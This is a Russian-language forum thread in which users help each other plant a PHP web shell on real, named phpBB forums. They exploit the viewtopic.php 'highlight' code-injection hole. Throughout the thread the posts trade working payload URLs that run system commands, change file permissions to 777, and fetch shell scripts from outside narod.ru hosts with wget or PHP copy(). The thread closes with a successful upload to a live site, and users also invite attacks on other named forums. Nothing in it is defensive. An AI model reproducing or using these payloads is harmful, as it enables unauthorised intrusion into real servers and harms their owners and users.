Не получается залить шелл. Я понимаю, что это звучит оооооочень глупо, но я уже не знаю, что делать… я уже все перепробовал… дело в том, что первый раз у меня получилось залить, но получилось не до конца… т.е. только половину файла ). На второй день уже нечего не получается залить… (. У меня настроение упало в несколько раз… сейчас сижу, голову ломаю, и думаю, где я мог проламерится…(… ну вроде все ж правильно…(
Просмотр директории, добавлять полные права, у меня выходит, а вот инклуд, или заливка, полный пи$%ец…
viewtopic.php?xxx=wget%20http://zattack.narod.ru/rem.php&t=10&highlight=%2527.include($_GET[xxx]).include.%2527
Ну ЧТО ТУТ НЕПРАВИЛЬНО??? Вить viewtopic.php?xxx=echo%20huitext&t=10&highlight=%2527.include($_GET[xxx]).include.%2527 срабатывает…
ПЛЗ, очень прошу помогите разобраться в этой х%$@e...(

попробуй так.
http://[Target]/viewtopic.php?p=44&highlight=%2527.$poster=pwd;ls%20-l;wget%20http://docentattack.narod.ru/p.php

как стать хацкером?

как стать хацкером?
Это вопрос риторический. Для того что-бы немного разбиратя в этом всем.
Я прочитал книги:
Html;
css;
Linux;
PHP5;
Javascript.
Почитай =)

попробуй так.
http://[Target]/viewtopic.php?p=44&highlight=%2527.$poster=pwd;ls%20-l;wget%20http://docentattack.narod.ru/p.php
------------------------------------------
Parse error: parse error, unexpected ';' in /var/www/virtual/ua/com/kievnet/forum/htdocs/viewtopic.php(1109) : regexp code on line 1

Fatal error: preg_replace() [function.preg-replace]: Failed evaluating code: preg_replace('#\b('\.$poster\=pwd;ls|-l;wget|http\://zattack\.narod\.ru/zz\.php)\b#i', '<span style="color:#FFA34F"><b>\1</b></span>', '><') in /var/www/virtual/ua/com/kievnet/forum/htdocs/viewtopic.php on line 1109

Неее... фанарь... не работает (((

Парень, ты наверное немного ошибся:
правильно будет так:

highlight=%2527.system($_GET[id]).%2527&id=wget url...

а ты пытаешься выпонить системную команду, когда сам пишешь include($_GET[xxx]) :)
расскажи как ты добавляешь полные права...
.htaccess правишь что-ли?

Парень, ты наверное немного ошибся:
правильно будет так: viewtopic.php?t=1&highlight=%2527.system($_GET[id]).%2527&id=wget%20http://zattack.narod.ru/rem.php
а ты пытаешься выпонить системную команду, когда сам пишешь include($_GET[xxx]) :)
Мля... все равно бага не пашет (
расскажи как ты добавляешь полные права...
viewtopic.php?t=1&highlight=%2527.die(%60cd%09../;chmod%09777%09_FILE.php_;pwd;ls%09-l%60).%2527

у тебя после wget стоит |

у тебя после wget стоит |
???
...=wget%20ht...
дык. %20 это ж пробел...
Или я что-то не так понял...???

Вот вчера ночью заметил еще один вариант…
Решил попробовать… для начала ввел
viewtopic.php?t=26&sid=01e4a9e8bcccb0c6b19d5509d949ab55&highlight=%2527.$poster=`pwd`.%2527
Вылезло место нахождения форума… /var/www/virtual/ua/com/kievnet/forum/htdocs
Все, я такой радый, прям как слон, уверен в победе, ввожу
http://forum.kievnet.com.ua/viewtopic.php?t=26&sid=01e4a9e8bcccb0c6b19d5509d949ab55&highlight=%2527.$poster=`$cmd`.%2527&cmd=cd%20..;ls%20-l . Т.е. чтоб передо мной высветился списочек файлов и их прав…
Место этого появилось )\b#i .
Ну этт вообще нормально???

Это вопрос риторический. Для того что-бы немного разбиратя в этом всем.
Я прочитал книги:
Html;
css;
Linux;
PHP5;
Javascript.
Почитай =)
И че эт надо читать и понимать???
нелегка хакерская доля...
Сделали бы школу хацкеров-стопудово народу было бы....
и я б записался...
эх,мож кто научит,а мож и сам научусь

1Народ...мля..я конечно понимаю..но это уже оффтопик...
2Что, некто нечего подсказать не может???? Ну и где же знаменитые модераторы, админы? )

я в этом не разбираюсь,вот,зайди завтра мож ответят;а вообще надо типа чата что-нить сделать-я уже предлагал,но...

А толку даже если бы чат был?
А школы не будет =) Потому что тогда и хакеров не будет.

Вот так же раньше было. Были все неучи, типа, и один чел, его звали Эйнштейн был учёным... Он там всякие вещи наизобретал и народ подумал, а что если школу открыть, может все Эйнштейнами станем. Школу открыли а толку нету.
Так же и с хакерской школой будет.

Хакерами не становяться - хакерами рождаются!!!!!!!!!!!!! :D

мля... ну я ж по человечески просил... никаких оффпостов..

Вот у меня возник еще один вопрос… эти команды именно для Linux? А если на сервере стоит например FreeBSD? Команды будут те же???

Мда... молчание... все внезапно претворились ламерами )

Команды практически одинаковы на Linux и FreeBSD процентов на 90. Разница в установленом програмном обеспечении. В стандартной установке FreeBSD нет никаких левых прог. В линуксе в любом дистрибутиве прог довольно много.
Это вкрадце.

Егорыч+++, будут какие-то идеи или намеки, по поводу #10 вопроса? Жалко вить…

Тут мне подсказывали, найди другой форум… А интерес? Я не понимаю… ломать под известные уязвимости все что попадется под руку? Лично я, не вижу не интереса, не смысла. Я задаю перед собой цель, конечную цель… Не имеет значение сколько на это уйдет время, сколько я буду долбиться об клавиатуру головой, я ее все равно выполню, до конца…

-SX- как ты загнул шелл?У меня нах не получается,все команды тоже пишет:
Warning: shell_exec() has been disabled for security reasons in /disk2/clients/a1673/mytischi.com/htdocs/phpbb/viewtopic.php(1104) : regexp code on line 1
Будешь любезен,можешь попробовать сам здесь
http://www.mytischi.com/phpbb
Если получится дай команду,которой запускал

Megaladon нечего ты там не сделаешь... Сверху слева видешь, что написано? )
и + к тому
Warning: shell_exec() has been disabled for security reasons

Что это значит?

А это кабы он переехал?Да?

yну можешь попробовать этот?
http://www.taekwon-do.ru/forum

Megaladon oбрати внимание на версию форума…

Наконец залил… )
Кому интересно как, см. новость "phpBB Хоть и старьё!!!" =)
Пример http://forum.kievnet.com.ua/viewtopic.php?a=http://zattack.narod.ru/zz.php&b=/var/www/virtual/ua/com/kievnet/forum/htdocs/zz.php&t=1&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527